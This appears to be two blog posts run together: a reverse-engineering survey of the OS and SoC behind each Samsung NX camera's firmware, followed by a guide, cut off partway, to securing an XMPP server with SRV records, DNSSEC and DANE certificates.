Many years ago, in the summer of 2014, I fell into the rabbit hole of the Samsung NX(300) mirrorless APS-C camera, found out it runs Tizen Linux, analyzed its WiFi connection, got a root shell and looked at adding features.
The next year, Samsung "quickly adapted to market demands" and abandoned the whole NX ecosystem, but I'm still an active user of the NX500 and the NX mini (for infrared photography). A few months ago, I was prompted to find out which firmware framework is powering which of the 19(!!!) NX models that Samsung released between 2010 and 2015. The TL;DR results are documented in the Samsung NX model table, and this post contains more than you ever wanted to know, unless you are a Samsung camera engineer.
Hardware Overview
There is a Wikipedia list of all the released NX models that I took as my starting point. The main product line is centered around the NX mount, and the cameras have a "NXnnnn" numbering scheme, with "nnnn" being a one- to four-digit number.
In addition, there is the Galaxy NX, which is an Android phone, but also has the NX mount and a DRIM engine DSP. This fascinating half-smartphone half-camera line began in 2012 with the Galaxy Camera and featured a few Android models with zoom lenses and different camera DSPs.
In 2014, Samsung introduced the NX mini with a 1" sensor and the "NX-M" lens mount, sharing much of the architecture with the larger NX models.
In 2015, they ~~announced~~ accidentally leaked the NX mini 2, based on the DRIMeV SoC and running Linux, and even submitted it to the FCC, but it never materialized on the market after Samsung "shifted priorities". If you are the janitor in Samsung's R&D offices and know where all the NX mini 2 prototypes are locked up, or if you were involved in making them, I'd die to get my hands on one of them!
Most of the NX cameras are built around different generations of the "DRIM engine" image processor, so it's worth looking at that as well.
The Ukrainian company photo-parts has a rather extensive list of NX model boards, even featuring a few well-made PCB photographs. While their page is quirky, the documentation is excellent and matches my findings. They have documented the DRIMe CPU generation for many, but not for all, NX cameras.
Origins of the DRIM engine
Apparently the first cameras introducing the DRIM engine were the NV30/NV40 in 2008. Going through the service manuals of the NV cameras reveals the following:
- NV30 (the Samsung camera, not the Samsung laptop with the same model number): using the Milbeaut MB91686 image processor introduced in 2006
- NV40: also using the MB91686
- NV24: "TWE (MB91043)"
- NV100 (also called TL34HD in some regions): "DRIM II (MB91043)"
It looks like the DRIM engine is a re-branded Milbeaut MB91686, and the DRIM engine II is an MB91043. Unfortunately, nothing public is known about the latter, and it doesn't look like anybody ever talked about this processor model.
Even more unfortunately, I wasn't able to find a (still working) firmware download for any of those cameras.
Firmware Downloads
Luckily, the firmware situation is better for the NX cameras. To find out more about each of them, I visited the respective Samsung support page and downloaded the latest firmware release. For the Android-based cameras however, firmware images are only available through shady "Samsung fan club" sites.
The first classification was provided by the firmware size, as the files fell into distinct buckets: the first generation (NX5, NX10, NX11) had unzipped sizes of ~15MB, while the last generation (NX1, NX500) was beyond 350MB.
Googling for the respective NX and "DRIM engine" press releases, PCB photos and other related materials helped identify the specific generation. Sometimes there were no press releases mentioning the SoC, and I had to resort to PCB photos found online or taken by myself or other NX enthusiasts.
Further information was obtained by checking the firmware files with strings
and
binwalk, with the details documented
below.
Note: most firmware files contain debug strings and file paths, often
mentioning the account name of the respective developer. Personal names of
Samsung developers are masked out in this blog post to protect the ~~guilty~~ innocent.
Mirrorless Cameras
DRIMeII: NX10, NX5, NX11, NX100
The first NX camera released by Samsung was the NX10, so let's look into its firmware. The ZIP contains an nx10.bin, and running that through strings -n 20 still yields some 11K unique entries.
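If you want to reproduce this without GNU binutils, a rough equivalent of strings -n 20 fits into a few lines of Python (a quick approximation, not a full reimplementation; the keyword filter matches the searches below):

```python
import re
import sys

# rough equivalent of `strings -n 20`: runs of >= 20 printable ASCII bytes
with open(sys.argv[1], "rb") as f:
    strings = set(re.findall(rb"[\x20-\x7e]{20,}", f.read()))

print(len(strings), "unique strings")
for s in sorted(strings):
    if re.search(rb"version|revision|copyright", s, re.IGNORECASE):
        print(s.decode("ascii"))
```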
There are no matches for "DRIM", but searching for "version", "revision", and "copyright" yields a few red herrings:
* Powered by [redacted] in DSLR team *
* This version apadpter for NX10 (16MB NOR) *
* Ice Updater v 0.025 (Base on FW Updater) *
* Hermes Firmware Version 0.00.001 (hit Enter for debugger prompt) *
* COPYRIGHT(c) 2008 SYRI *
It's hardly possible to find out the details behind those names after more than a decade, and we still don't know which OS is powering the CPU.
One hint is provided by the source code reference in the binary:
D:\070628_view\NX10_DEV_MAIN\DSLR_PRODUCT\DSP\Project\CSP\..\..\Source\System\CSP\CSP_1.1_Gender\CSP_1.1\uITRON\Include\PCAlarm.h
This seems to be based on a "CSP" and to feature "uITRON". The former might be the Samsung Core Software Platform, as identified by the following copyright notice in the firmware file:
Copyright (C) SAMSUNG Electronics Co.,Ltd.
SAMSUNG (R) Core SW Platform 2.0 for CSP 1.1
The latter is µITRON, a Japanese real-time OS specification going back to 1984. So let's assume the first camera generation (everything released in 2010) is powered by µITRON, as NX5, NX10 and NX11 have the same strings in their firmware files.
The NX100 is very similar to the above devices, but its firmware is roughly twice the size, given that it has a 32MB NOR flash (according to the bootloader strings). However, there are only 19MB of non-0x00, non-0xff data, and from comparing the extracted strings no significant new modules could be identified.
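The payload estimate is easy to reproduce with a few lines of Python, if you want to check other NOR images:

```python
import collections
import sys

# count all byte values, then ignore the 0x00/0xff flash padding
with open(sys.argv[1], "rb") as f:
    counts = collections.Counter(f.read())

payload = sum(counts.values()) - counts[0x00] - counts[0xff]
print(f"{payload / 2**20:.1f} MB of non-0x00, non-0xff data")
```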
None of them identify the DRIM engine generation, but the NX10 service manual labels the CPU as "DSP (DRIMeII Pro)", so probably related to but slightly better than NV100's "DRIM II MB91043". Furthermore, all of these models are documented as "DRIM II" by photo-parts, and there is a well-readable PCB shot of the NX100 saying "DRIM engine IIP".
DRIMeIII: NX200, NX20, NX210, NX1000, NX1100
One year later, in 2011, Samsung released the NX200 powered by the DRIM (engine) III. It was followed in 2012 by the NX20, NX210, and NX1000/NX1100 (the only difference between the last two is a bundled Adobe Lightroom). The NX20 emphasizes professionalism, while the NX1x00 and NX2x0 stand for compact mobility.
The NX200 firmware also makes a significant leap to 77MB uncompressed, and the following models clock in at around 102MB uncompressed.
Each of the firmware ZIPs contains two files named after the model, e.g. nx200.Rom and nx200.bin. Binwalking the Rom doesn't yield anything of value, except roughly a dozen artistic collage background pictures. strings confirms that it is some sort of filesystem not identified by binwalk (and it contains a classical music compilation, with tracks titled "01_Flohwalzer.mp3" to "20_Spring.mp3", each roughly a minute long, sounding like ringtones from the 2000s)! The pictures and music files can be extracted using PhotoRec.
Binwalking the bin yields a few interesting strings though:
8738896 0x855850 Unix path: /opt/windRiver6.6/vxworks-6.6/target/config/comps/src/edrStub.c
...
10172580 0x9B38A4 Copyright string: "Copyright (C) 2011, Arcsoft Inc."
10275754 0x9CCBAA Copyright string: "Copyright (c) 2000-2009 by FotoNation. All rights reserved."
10485554 0x9FFF32 Copyright string: "Copyright Wind River Systems, Inc., 1984-2007"
10495200 0xA024E0 VxWorks WIND kernel version "2.11"
So we have identified the OS as Wind River's VxWorks.
A strings
inspection of the bin
also gives us "ARM DRIMeIII - ARM926E
(ARM)" and "DRIMeIII H.264/AVC Encoder", confirming the SoC generation, weird
network stuff ("ftp password (pw) (blank = use rsh)"), and even some fancy
ASCII art:
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]] ]]]] ]]]]]]]]]] ]] ]]]] (R)
] ]]]]]]]]] ]]]]]] ]]]]]]]] ]] ]]]]
]] ]]]]]]] ]]]]]]]] ]]]]]] ] ]] ]]]]
]]] ]]]]] ] ]]] ] ]]]] ]]] ]]]]]]]]] ]]]] ]] ]]]] ]] ]]]]]
]]]] ]]] ]] ] ]]] ]] ]]]]] ]]]]]] ]] ]]]]]]] ]]]] ]] ]]]]
]]]]] ] ]]]] ]]]]] ]]]]]]]] ]]]] ]] ]]]] ]]]]]]] ]]]]
]]]]]] ]]]]] ]]]]]] ] ]]]]] ]]]] ]] ]]]] ]]]]]]]] ]]]]
]]]]]]] ]]]]] ] ]]]]]] ] ]]] ]]]] ]] ]]]] ]]]] ]]]] ]]]]
]]]]]]]] ]]]]] ]]] ]]]]]]] ] ]]]]]]] ]]]] ]]]] ]]]] ]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]] Development System
]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]] KERNEL:
]]]]]]]]]]]]]]]]]]]]]]]]] Copyright Wind River Systems, Inc., 1984-2007
The 2012 models (NX20, NX210, NX1000, NX1100) contain the same copyright and CPU identification strings after a cursory look, confirming the same info about the third DRIMe generation.
Side note: there is also a compact camera from early 2010, the WB2000/TL350 (EU/US name), also built around the DRIMeIII and also running VxWorks. It looks like it was developed in parallel to the DRIMeII based NX10!
Another camera based on DRIMeIII and VxWorks is the EX2F from 2012.
DRIMeIV, Tizen Linux: NX300(M), NX310, NX2000, NX30
In early 2013, Samsung gave a CES press conference announcing the DRIMe IV based NX300. Linux was not mentioned, but we got a novelty single-lens 3D feature and an AMOLED screen. Samsung also published a design overview of the NX300 evolution.
I've looked into the NX300 root filesystem back in 2014, and the CPU generation was also confirmed from /proc/cpuinfo:
Hardware : Samsung-DRIMeIV-NX300
The NX310 is just an NX300 with additional bundled gimmicks, sharing the same firmware. The actual successor to the NX300 is the NX2000, featuring a large AMOLED and almost no physical buttons (why would anybody buy a camera without knobs and dials?). It's followed by the NX300M (a variant of the NX300 with a 180° tilting screen) and the NX30 (released 2014, a larger variant with an EVF and built-in flash).
All of them have similarly sized and named firmware (nx300.bin), and the respective OSS downloads feature a TIZEN folder. All are running Linux kernel 3.5.0. There is a nice description of the firmware file structure by Douglas J. Hickok. The bin files begin with SLP\x00, probably for "Samsung Linux Platform", and thus I documented them as the SLP Firmware Format and created an SLP firmware dumper.
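A minimal sanity check along the lines of that dumper can be sketched in Python; the full header layout (version, model and partition table) is in the linked format documentation, so this only verifies the magic:

```python
import sys

# SLP images start with the magic bytes "SLP\x00"; the partition table
# that follows is described in the SLP Firmware Format documentation
with open(sys.argv[1], "rb") as f:
    header = f.read(64)

if header[:4] != b"SLP\x00":
    sys.exit(f"{sys.argv[1]}: not an SLP firmware image")
print("SLP magic found, header bytes:", header.hex(" "))
```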
Fujitsu M7MU: NX mini, NX3000, NX3300
In the first half of 2014, the NX mini was announced. It also features WiFi and NFC, and with its NX-M mount it is one of the smallest digital interchangeable-lens cameras out there! The editor notes reveal that it's based on the "M7MU" DSP, which unfortunately is impossible to google for.
The firmware archive contains a file called DATANXmini.bin
(which is not the
SLP format and also a break with the old-school 8.3 filename
convention), and it seems to
use some sort of data compression, as most strings are garbled after 16
bytes or earlier (C:\colomia\Gui^@^@Lib\Sources\Core^@^PAllocator.H
, here
using Vim's binary escape notation).
There are a few string matches for "M7MU", but nothing that would reveal details about its manufacturer or operating system. The (garbled) copyright strings give a mixed picture, with mentions of:
- ArcSoft
- FotoNation (face detection?)
- InterNiche Technologies (probably for their IPv4 network stack)
- DigitalOptics Corporation (optical systems)
- Jouni Malinen and contributors, with something that looks like a GPL header(!?!?):
Copyright (c) 2<80>^@^@5-2011, Jouni Ma^@^@linen <*@**.**>
^@^@and contributors^@^B^@This program ^@^Kf^@^@ree software. Yo!
u ^@q dis^C4e it^AF/^@<9c>m^D^@odify^@^Q
under theA^@ P+ms of^B^MGNU Gene^A^@ral Pub^@<bc> License^D^E versPy 2.
This doesn't give us any hints on what is powering this nice curiosity of an ILC. The few PCB photos available on the internet have the CPU covered with a sticker, so no dice there either. All of the above similarly applies to the NX3000, which is running very similar code but has the larger NX mount, and the NX3300, which is a slightly modified NX3000 with more selfie shooting and less Adobe Lightroom.
It took me quite a while of fruitless guessing, until I was able to obtain a (broken) NX3000 and disassemble it, just to remove the CPU sticker.
The sticker revealed that the CPU is actually an "MB86S22A", another Fujitsu Milbeaut Image Processor, with M-7M being the seventh generation (not sure about "MU", but there is "MO" for mobile devices), built around the ARM Cortex-A5MP core!
Github code search reveals that there is actually an M7MU driver in the forked Exynos Linux kernel, and it defines the firmware header structure. Let's hack together a header reader in python real quick now, and run that over the NX mini firmware:
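A sketch of such a reader is shown below; the field order and sizes are my interpretation of the driver's header struct, so verify the offsets against the kernel source before trusting them:

```python
import struct
import sys

# Assumed field layout, loosely following the firmware header struct in the
# forked Exynos kernel's M7MU driver -- treat the offsets as guesses.
FIELDS = [
    ("block_size", "I"), ("writer_load_size", "I"), ("write_code_entry", "I"),
    ("sdram_param_size", "I"), ("nand_param_size", "I"),
    ("sdram_data", "144s"), ("nand_data", "225s"),
    ("code_size", "I"), ("offset_code", "I"),
    ("version1", "5s"), ("log", "12s"), ("version2", "7s"), ("model", "13s"),
    # section_info, pdr, ddr and epcr follow; omitted here
]

def m7mu_str(raw: bytes) -> str:
    # text fields have the high bit set: ce d8 cd c9 ce c9 masks to "NXMINI"
    return bytes(b & 0x7f for b in raw).strip(b"\x00").decode("ascii", "replace")

with open(sys.argv[1], "rb") as f:
    hdr = f.read(4096)

pos = 0
for name, fmt in FIELDS:
    (value,) = struct.unpack_from("<" + fmt, hdr, pos)
    pos += struct.calcsize(fmt)
    if isinstance(value, bytes):
        print(f"{name:18} {value.hex(' ')} ({m7mu_str(value)!r})")
    else:
        print(f"{name:18} {value:#x} ({value})")
```

Masking off the high bit turns the model field into "NXMINI" and the log field into what looks like a build timestamp (201501162119).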
Header | Value |
---|---|
block_size | 0x400 (1024) |
writer_load_size | 0x4fc00 (326656) |
write_code_entry | 0x40000400 (1073742848) |
sdram_param_size | 0x90 (144) |
nand_param_size | 0xe1 (225) |
sdram_data | *stripped 144 bytes* |
nand_data | *stripped 225 bytes* |
code_size | 0xafee12 (11529746) |
offset_code | 0x50000 (327680) |
version1 | b0 b1 ae b1 b0 |
log | b2 b0 b1 b5 b0 b1 b1 b6 b2 b1 b1 b9 |
version2 | c7 cc d5 c1 cf c1 b2 |
model | 80 80 80 80 ce d8 cd c9 ce c9 80 80 80 |
section_info | 00000007 00000001 0050e66c 00000002 001a5985 00000003 00000010 00000004 00061d14 00000005 003e89d6 00000006 00000010 00000007 00000010 00000000 9x 00000000 |
pdr | "" |
ddr | 00 b3 3f db 26 02 08 00 d7 31 08 29 01 80 00 7c 8c 07 |
epcr | 00 00 3c db 00 00 08 30 26 00 f8 38 00 00 00 3c 0c 07 |
That was less than informative. At least it's a good hint for loading the firmware into a decompiler, if anybody gets interested enough.
But why should the Linux kernel have a module to talk to an M7MU? One of the
kernel trees containing that code is called kernel_samsung_exynos5260
and the
Exynos 5260 is the SoC powering the Galaxy K
Zoom. So
the K Zoom does have a regular Exynos SoC running Android, and a second
Milbeaut SoC running the image processing. Let's postpone this Android
hybrid for now.
DRIMeV, Tizen Linux: NX1, NX500, Gear360
In late 2014, Samsung released the high-end DRIMeV-based NX1, featuring a backside-illuminated 28 MP sensor and 4K H.265 video in addition to all the features of previous NX models. There was also an interview with a very excited Samsung Senior Marketing Manager that contains PCB shots and technical details. Once again, Linux is only mentioned in third-party coverage, e.g. in the EOSHD review.
In February 2015, the NX1 was followed by the more compact NX500 based around a slightly reduced DRIMeVs SoC. Apparently, the DRIMeVs also powers the Gear 360 camera, and indeed, there is a teardown with PCB shots confirming that and showing an additional MachXO3 FPGA, but also some firmware reverse-engineering as well as firmware mirroring efforts. The Gear360 is running Tizen 2.2.0 "Magnolia" and requires a companion app for most of its functions.
The NX1 is using the same modified version of the SLP firmware format as the
Gear360. In versions before 1.21, the ext4 partitions were uncompressed,
leading to significantly larger bin
file sizes. They still contain Linux
3.5.0 but ext4 is a significant change over the
UBIFS on the DRIMeIV cameras, and
allows in-place modification from a telnet shell.
Android phones with dedicated photo co-processor
Samsung has also experimented with hybrid devices that are neither smartphone nor camera. The first such device seems to be the Galaxy Camera from 2012.
The Android firmware ZIP files (obtained from a Samsung "fan club"
website) contain one or multiple tar.md5
files (which are tar archives with
appended MD5 checksums to be flashed by
Odin).
Galaxy Camera (EK-GC100, EK-GC120)
For the Galaxy Camera EK-GC100, there is a
CODE_GC100XXBLL7_751817_REV00_user_low_ship.tar.md5
in the ZIP, that
contains multiple .img
files:
-rw-r--r-- se.infra/se.infra 887040 2012-12-26 12:12 sboot.bin
-rw-r--r-- se.infra/se.infra 768000 2012-12-26 11:41 param.bin
-rw-r--r-- se.infra/se.infra 159744 2012-12-26 12:12 tz.img
-rw-r--r-- se.infra/se.infra 4980992 2012-12-26 12:12 boot.img
-rw-r--r-- se.infra/se.infra 5691648 2012-12-26 12:12 recovery.img
-rw------- se.infra/se.infra 1125697212 2012-12-26 12:11 system.img
None of these look like camera firmware, but system.img is the Android rootfs (a sparse image, convertible with simg2img to obtain an ext4 image). In the rootfs, /vendor/firmware/ contains a few files, including a 1.2MB fimc_is_fw.bin.
The Galaxy Camera Linux source has an Exynos FIMC-IS (Image Subsystem) driver working over I2C, and the firmware itself contains a few interesting strings:
src\FIMCISV15_HWPF\SIRC_SDK\SIRC_Src\ISP_GISP_HQ_ThSc.c
* S5PC220-A5 - Solution F/W *
* since 2010.05.21 for ISP Team *
SIRC-ISP-SDK-R1.02.00
https://svn/svn/SVNRoot/System/Software/tcevb/SDK+FW/branches/Pegasus-2012_01_12-Release
"isp_hardware_version" : "Fimc31"
Furthermore, the firmware bin file seems to start with a typical ARM v7 reset vector table, but other than that it looks like the image processor is a built-in component of the Exynos4 SoC.
Galaxy S4 Zoom: SM-C1010, SM-C101, SM-C105
The next Android hybrid released by Samsung was the Galaxy S4
Zoom
(SM-C1010, SM-C101, SM-C105) in 2013. In its CODE_[...].tar.md5
firmware, there is an additional 2MB camera.bin
file that contains the
camera processor firmware. Binwalk only reveals a few FotoNation copyright
strings, but strings
gives some more interesting
hints, like:
SOFTUNE REALOS/ARM is REALtime OS for ARM.COPYRIGHT(C) FUJITSU MICROELECTRONICS LIMITED 1999
M9MOFujitsuFMSL
AHFD Face Detection Library M9Mo v.1.0.2.6.4
Copyright (c) 2005-2011 by FotoNation. All rights reserved.
LibFE M9Mo v.0.2.0.4
Copyright (c) 2005-2011 by FotoNation. All rights reserved.
FCGK02 Fujitsu M9MO
Softune is an IDE used by Fujitsu and Infineon for embedded processors, featuring the REALOS µITRON real-time OS!
M9MO sounds like a 9th generation Milbeaut image processor, but again there is not much to see without the model number, and it's hard to find good PCB shots without stickers. There is an S4 Zoom disassembly guide featuring quite a few PCB shots, but the top side only shows the Exynos SoC, eMMC flash and an Intel baseband. There are uncovered bottom pics submitted to the FCC, but they are too low-res to identify whether there is a dedicated SoC.
As shown above, Samsung has a history of working with Milbeaut and µITRON, so it's probably not a stretch to conclude that this combination powers the S4 Zoom's camera, but it's hard to say if it's a logical core inside the Exynos 4212 or a dedicated chip.
Galaxy NX: EK-GN100, EK-GN120
Just one week after the S4 Zoom, still in June 2013, Samsung announced the Galaxy NX (EK-GN100, EK-GN120) with interchangeable lenses, 20.3MP APS-C sensor, and DRIMeIV SoC - specs already known from January's NX300.
But the Galaxy NX is also an Android 4.2 smartphone (even if it lacks microphone and speakers, so technically it's just a micro-tablet?). How can it be a DRIMeIV Linux device and an Android phone at the same time? The firmware surely will enlighten us!
Similarly to the S4 Zoom, the firmware is a ZIP file containing a [...]_HOME.tar.md5. One of the files inside it is camera.bin, and this time it's 77MB! This file now features the SLP\x00 header known from the NX300:
camera.bin: GALAXYU firmware 0.01 (D20D0LAHB01) with 5 partitions
144 5523488 f68a86 ffffffff vImage
5523632 7356 ad4b0983 7fffffff D4_IPL.bin
5530988 63768 3d31ae89 65ffffff D4_PNLBL.bin
5594756 2051280 b8966d27 543fffff uImage
7646036 71565312 4c5a14bc 4321ffff platform.img
The platform.img
file contains a UBIFS root partition, and presumably vImage
is used for upgrading the DRIMeIV firmware, and uImage is the standard kernel
running on the camera SoC. The rootfs is very similar to the NX300 as well,
featuring the same "squeeze/sid" string in /etc/debian_version
, even though
it's again Tizen / Samsung Linux Platform. There is a 500KB
/usr/bin/di-galaxyu-app
that's probably responsible for camera operation
as well as for talking to the Android CPU. Further reverse engineering is
required to understand what kind of IPC mechanism is used between the cores.
The Galaxy NX got the CES 2014 award for the first fully-connected interchangeable lens camera, but probably not for fully-connecting a SoC running Android-flavored Linux with a SoC running Tizen-flavored Linux on the same board.
Galaxy Camera 2
Shortly after the Galaxy NX, the Galaxy Camera 2 (EK-GC200) was announced and presented at CES 2014.
Very similar to the first Galaxy Camera, it has a 1.2MB
/vendor/firmware/fimc_is_fw.bin
file, and also shares most of the strings
with it. Apart from a few changed internal SVN URLs, this seems to be roughly
the same module.
Galaxy K Zoom: SM-C115, SM-C111, SM-C115L
As already identified above, the Galaxy K
Zoom
(SM-C115, SM-C111, SM-C115L), released in June 2014, is using the M7M image
processor. The respective firmware can be found inside the Android rootfs at
/vendor/firmware/RS_M7MU.bin
and is 6.2MB in size. It also features the same
compression mechanism as the NX mini firmware, making it harder to analyze,
but the M7MU firmware header looks more consistent:
Header | Value |
---|---|
code_size | 0x5dee12 (6155794) |
offset_code | 0x40000 (262144) |
version1 | "00.01" |
log | "201405289234" |
version2 | "D20FSHE" |
model | "06DAGCM2" |
Conclusion
In just five years, Samsung released eighteen cameras and one smartphone/camera hybrid under the NX label, plus a few more phones with zoom lenses, built around the Fujitsu Milbeaut SoC as well as multiple generations of Samsung's custom-engineered (or maybe initially licensed from Fujitsu?) DRIM engine.
The number of different platforms and overlapping release cycles is a strong indication that the devices were developed by two or three product teams in parallel, or maybe even independently of each other. This engineering effort could have proven a huge success with amateur and professional photographers, if it hadn't been stopped by Samsung management.
To this day, the Tizen-based NX models remain the best trade-off between picture quality and hackability (in the most positive meaning).
(*) All pictures (C) Samsung marketing material
.IM top-level domain Domain Name System Security Extensions Look-aside Validation DNS-based Authentication of Named Entities Extensible Messaging and Presence Protocol TLSA ("TLSA" does not stand for anything; it is just the name of the RRtype) resource record.
Okay, seriously: this post is about securing an XMPP server running on an .IM domain with DNSSEC, using yax.im as a real-life example. In the world of HTTP there is HPKP, and browsers come with a long list of pre-pinned site certificates for the who's who of the modern web. For XMPP, DNSSEC is the only viable way to extend the broken Root CA trust model with a slightly-less-broken hierarchical trust model from DNS (there is also TACK, which is impossible to deploy because it modifies the TLS protocol, and is also unmaintained).
Because the .IM TLD is not DNSSEC-signed yet, we will need to use
DLV (DNSSEC Look-aside Validation), an additional
DNSSEC trust root operated by the ISC (until the end of 2016). Furthermore, we
will need to set up the correct entries for yax.im
(the XMPP service domain),
chat.yax.im
(the conference domain) and xmpp.yaxim.org
(the actual server
running the service).
This post has been sitting in the drafts folder for a while, but now that DANE-SRV has been promoted to Proposed Standard, it seemed like a good time to finalize the article.
Introduction
Our (real-life) scenario is as follows: the yax.im
XMPP service is run on a server named
xmpp.yaxim.org
(for historical reasons, the yax.im
host is a web server
forwarding to yaxim.org
, not the actual XMPP server). The service furthermore
hosts the chat.yax.im
conference service, which needs to be accessible from
other XMPP servers as well.
In the following, we will create
SRV
DNS records
to advertise the server name, obtain a TLS certificate, configure DNSSEC on
both domains and create (signed)
DANE
records that define which certificate a client can expect when connecting.
Once this is deployed, state-level attackers will not be able to MitM users of the service simply by issuing rogue certificates; they would also have to compromise the DNSSEC chain of trust (in our case one of the following: ICANN/VeriSign, DLV, PIR or the registrar/NS hosting our domains, essentially limiting the number of states able to pull this off to one).
Creating SRV Records for XMPP
The service / server separation is made possible with the
SRV
record in DNS, which is a more
generic variant of records like MX
(e-mail server) or NS
(domain name
server) and defines which server is responsible for a given service on a given
domain.
For XMPP, we create the following three SRV records to allow clients
(_xmpp-client._tcp
), servers (_xmpp-server._tcp
) and conference
participants (_xmpp-server._tcp
on chat.yax.im
) to connect to the right
server:
_xmpp-client._tcp.yax.im IN SRV 5 1 5222 xmpp.yaxim.org.
_xmpp-server._tcp.yax.im IN SRV 5 1 5269 xmpp.yaxim.org.
_xmpp-server._tcp.chat.yax.im IN SRV 5 1 5269 xmpp.yaxim.org.
The record syntax is: priority (5
), weight (1
), port (5222
for clients,
5269
for servers) and host (xmpp.yaxim.org
). Priority and weight are used
for load-balancing multiple servers, which we are not using.
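To check the records from a client's perspective, a short query with the dnspython package (an assumption here; any DNS library will do) looks like this:

```python
import dns.resolver  # pip install dnspython

# resolve the client SRV record like an XMPP client would
for rr in dns.resolver.resolve("_xmpp-client._tcp.yax.im", "SRV"):
    print(f"priority={rr.priority} weight={rr.weight} "
          f"port={rr.port} target={rr.target}")
```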
Attention: some clients (or their respective DNS resolvers, often hidden
in outdated, cheap, plastic junk routers provided by your "broadband" ISP)
fail to resolve SRV records, and thus fall back to the A
record. If you set
up a new XMPP server, you will slightly improve your availability by ensuring
that the A
record (yax.im
in our case) points to the XMPP server as well.
However, DNSSEC will be even more of a challenge for them, so let's write them off for now.
Obtaining a TLS Certificate for XMPP
While DANE allows rolling out self-signed certificates, our goal is to stay compatible with clients and servers that do not deploy DNSSEC yet. Therefore, we need a certificate issued by a trustworthy member of the Certificate Extortion ring. Currently, StartSSL and WoSign offer free certificates, and Let's Encrypt is about to launch.
Both StartSSL and WoSign offer a convenient function to generate your keypair. DO NOT USE THAT! Create your own keypair! This "feature" will allow the CA to decrypt your traffic (unless all your clients deploy PFS, which they don't) and only makes sense if the CA is operated by an Intelligence Agency.
What You Ask For...
The certificate we are about to obtain must be somehow tied to our XMPP
service. We have three different names (yax.im
, chat.yax.im
and
xmpp.yaxim.org
) and the obvious question is: which one should be entered into
the certificate request.
Fortunately, this is easy to find out, as it is well-defined in the XMPP Core specification, section 13.7:
In a PKIX certificate to be presented by an XMPP server (i.e., a "server certificate"), the certificate SHOULD include one or more XMPP addresses (i.e., domainparts) associated with XMPP services hosted at the server. The rules and guidelines defined in [TLS‑CERTS] apply to XMPP server certificates, with the following XMPP-specific considerations:
Support for the DNS-ID identifier type [PKIX] is REQUIRED in XMPP client and server software implementations. Certification authorities that issue XMPP-specific certificates MUST support the DNS-ID identifier type. XMPP service providers SHOULD include the DNS-ID identifier type in certificate requests.
Support for the SRV-ID identifier type [PKIX‑SRV] is REQUIRED for XMPP client and server software implementations (for verification purposes XMPP client implementations need to support only the "_xmpp-client" service type, whereas XMPP server implementations need to support both the "_xmpp-client" and "_xmpp-server" service types). Certification authorities that issue XMPP-specific certificates SHOULD support the SRV-ID identifier type. XMPP service providers SHOULD include the SRV-ID identifier type in certificate requests.
[...]
Translated into English, our certificate SHOULD contain yax.im
and
chat.yax.im
according to [TLS-CERTS], which is "Representation and
Verification of Domain-Based Application Service Identity within Internet
Public Key Infrastructure Using X.509 (PKIX) Certificates in the Context of
Transport Layer Security (TLS)", or for short
RFC 6125.
There, section 2.1
defines that there is the CN-ID (Common Name, which used to be the only entry
identifying a certificate), one or more DNS-IDs (baseline entries usable for
any services) and one or more SRV-IDs (service-specific entries, e.g. for
XMPP). DNS-IDs and SRV-IDs are stored in the certificate as
subject alternative names (SAN).
Following the above XMPP Core quote, a CA must support adding a DNS-ID and should support adding an SRV-ID field to the certificate. Clients and servers must support both field types. The SRV-ID is constructed according to
RFC 4985, section 2, where it
is called SRVName:
The SRVName, if present, MUST contain a service name and a domain name in the following form:
_Service.Name
For our XMPP scenario, we would need three SRV-IDs (_xmpp-client.yax.im
for
clients, _xmpp-server.yax.im
for servers, and _xmpp-server.chat.yax.im
for
the conference service; all without the _tcp.
part we had in the SRV
record). In addition, the two DNS-IDs yax.im
and chat.yax.im
are ~~required~~ recommended by the specification, allowing the certificate to be (ab)used for HTTPS as well.
Update: The quoted specifications allow creating an XMPP-only certificate based on SRV-IDs that contains no DNS-IDs (and has a non-hostname CN). Such a certificate could be used to delegate XMPP operations to a third party, or to limit the impact of leaked private keys. However, you will have a hard time convincing a public CA to issue one, and once you get it, it will be refused by most clients due to lack of SRV-ID implementation.
And then there is one more thing.
RFC 7673
proposes also checking the certificate for the SRV
destination
(xmpp.yaxim.org
in our case) if the SRV
record was properly validated,
there is no associated TLSA
record, and the application user was born under
the Virgo zodiac sign.
Summarizing the different possible entries in our certificate, we get the following picture:
Name(s) | Field Type | Meaning |
---|---|---|
yax.im or chat.yax.im | Common Name (CN) | Legacy name for really old clients and servers. |
yax.im, chat.yax.im | DNS-IDs (SAN) | Required entry telling us that the host serves anything on the two domain names. |
_xmpp-client.yax.im, _xmpp-server.yax.im | SRV-IDs (SAN) | Optional entry telling us that the host serves XMPP to clients and servers. |
_xmpp-server.chat.yax.im | SRV-ID (SAN) | Optional entry telling us that the host serves XMPP to servers for chat.yax.im. |
xmpp.yaxim.org | DNS-ID or CN | Optional entry if you can configure a DNSSEC-signed SRV record but not a TLSA record. |
...and What You Actually Get
Most CAs have no way to define special field types. You provide a list of
service/host names, the first one is set as the CN, and all of them are stored
as DNS-ID SANs. However, StartSSL offers "XMPP Certificates", which look like
they might do what we want above. Let's request one from them for yax.im
and
chat.yax.im
and see what we got:
openssl x509 -noout -text -in yaxim.crt
[...]
Subject: description=mjp74P5w0cpIUITY, C=DE, CN=chat.yax.im/emailAddress=hostmaster@yax.im
X509v3 Subject Alternative Name:
DNS:chat.yax.im, DNS:yax.im, othername:<unsupported>,
othername:<unsupported>, othername:<unsupported>, othername:<unsupported>
So it's othername:<unsupported>
, then? Thank you OpenSSL, for your
openness! From RFC 4985 we know that "othername" is the basic type of the
SRV-ID SAN, so it looks like we got something more or less correct. Using
this script
(highlighted source, thanks Zash), we
can further analyze what we've got:
Extensions:
X509v3 Subject Alternative Name:
sRVName: chat.yax.im, yax.im
xmppAddr: chat.yax.im, yax.im
dNSName: chat.yax.im, yax.im
Alright, the two service names we submitted ended up under three different field types:
- SRV-ID (it's missing the _xmpp-client./_xmpp-server. part and is thus invalid)
- xmppAddr (this was the correct entry type in the deprecated RFC 3920 XMPP specification, but is now only allowed in client certificates)
- DNS-ID (wow, these ones happen to be correct!)
